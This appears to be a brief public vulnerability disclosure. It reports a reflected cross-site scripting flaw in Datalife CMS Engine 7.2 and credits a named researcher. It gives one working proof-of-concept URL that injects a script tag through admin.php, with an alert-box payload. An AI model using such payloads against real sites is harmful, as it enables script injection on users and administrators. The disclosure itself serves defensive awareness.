Datalife CMS Engine version 7.2 suffers from a cross site scripting vulnerability.
05381d7dace49e26eabfb68825ab52ae3ca2cf67a15b88eb3737bd033ecd3487
Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
CMS: Datalife Engine ( version 7.2 )
Download CMS : http://datalifecms.ir/download/DatalifeEngine7.2.zip
-------------------------------------------
XSS
Exploit :
query : http://[www.example.com]/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E